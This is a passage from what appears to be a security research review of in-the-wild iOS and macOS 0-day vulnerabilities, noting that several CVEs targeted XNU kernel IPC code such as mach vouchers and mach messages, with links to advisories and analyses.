0-day in IOMobileFrameBuffer, [CVE-2022-22587](<https://support.apple.com/en-us/HT213053>).\n\nOne iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU\u2019s inter-process communication (IPC) functionality. [CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) exploited a vulnerability in mach vouchers while [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) exploited a vulnerability in mach messages. This is not the first time we\u2019ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. [CVE-2019-6625](<https://support.apple.com/en-us/HT209443>) was exploited as a part of [an exploit chain targeting iOS 11.4.1-12.1.2](<https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-5.html>) and was also a [vulnerability in mach vouchers](<https://googleprojectzero.blogspot.com/2019/01/voucherswap-exploiting-mig-reference.html>). \n\nMach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>) &amp; [CVE-2020-27950](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27950.html>). This year\u2019s [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) is a pretty close variant to 2020\u2019s [CVE-2020-27